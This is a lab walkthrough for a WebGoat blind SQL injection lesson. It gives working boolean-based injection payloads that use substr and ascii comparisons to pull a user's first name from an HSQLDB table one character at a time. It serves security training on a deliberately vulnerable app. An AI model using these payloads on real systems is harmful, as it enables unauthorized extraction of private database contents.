Lesson Plan Title: How to Perform Blind SQL Injection
Concept / Topic To Teach:
SQL injection
attacks represent a serious threat to any database-driven site. The methods behind
an attack are easy to learn and the damage caused can range from considerable
to complete system compromise. Despite these risks an incredible number of
systems on the internet are susceptible to this form of attack.
Not only is
it a threat easily instigated, it is also a threat that, with a little
common-sense and forethought, can be almost totally prevented. This lesson will
show the student several examples of SQL injection.
It is always
good practice to sanitize all input data, especially data that will used in OS
command, scripts, and database queries.
General Goal(s):
The user
should be able to view all records in the specified table. The user could add new records or modify
existing records.
From the hints J
Compound SQL
statements can be made by joining multiple tests with keywords like AND and OR.
Create a SQL statement that you can use as a true/false test and then select
the first character of the target element and do a start narrowing down the
character using > and <
The backend
database is HSQLDB. Keep that in mind if you research SQL functions
on the Internet since different databases use some different functions and
syntax.
This is the
code for the query being built and issued by WebGoat:
"SELECT
* FROM user_data WHERE userid = " + accountNumber
The
application is taking your input and inserting it at the end of a pre-formed
SQL command. You will need to make use of the following SQL functions:
SELECT -
query for your target data and get a string
substr(string,
start, length) - returns a substring of string starting at the start character
and going for length characters
ascii(string)
will return the ascii value of the first character in string
> and <
- once you have a character's value, compare it to a choosen one
Example: is
the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
101 AND (ascii(
substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 );
If you get
back that account number is valid, then yes. If get back that the number
is invalid then answer is no.
Another
example: is the second character of the first_name of userid 15613 greater than
'm' (ascii 109)?
101 AND (ascii(
substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109
);
If you get back
that account number is valid, then yes. If get back that the number is invalid
then answer is no.
Figure 1 Lesson 16
For the
query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613)
, 1 , 1) ) < 77 ); you will get a "Account number is valid". If the
character is bigger then the value you get an invalid account error message.
Figure 2 Invalid account number
You can
change the < to = to make sure that you have the correct value.
This results
in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 1 , 1) ) = 74 );
Figure 3 First character
So you know
that ascii(74) is capital J. Now do the same for the second and all other
characters.
The query for
the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 2 , 1) ) = 111 );
Ascii(111) =
o, so you have now Jo.
For the third
character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e
For the
fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s
For the fifth
character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 5 , 1) ) = 112); Ascii(112) = p
For the sixth
character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
userid=15613) , 6 , 1) ) = 104); Ascii(104) = h
So the name
that you found is Joesph. Enter this in the text field to complete this lesson.
Figure 4 Enter the name Joesph
Figure 5 Lesson 16 Completed
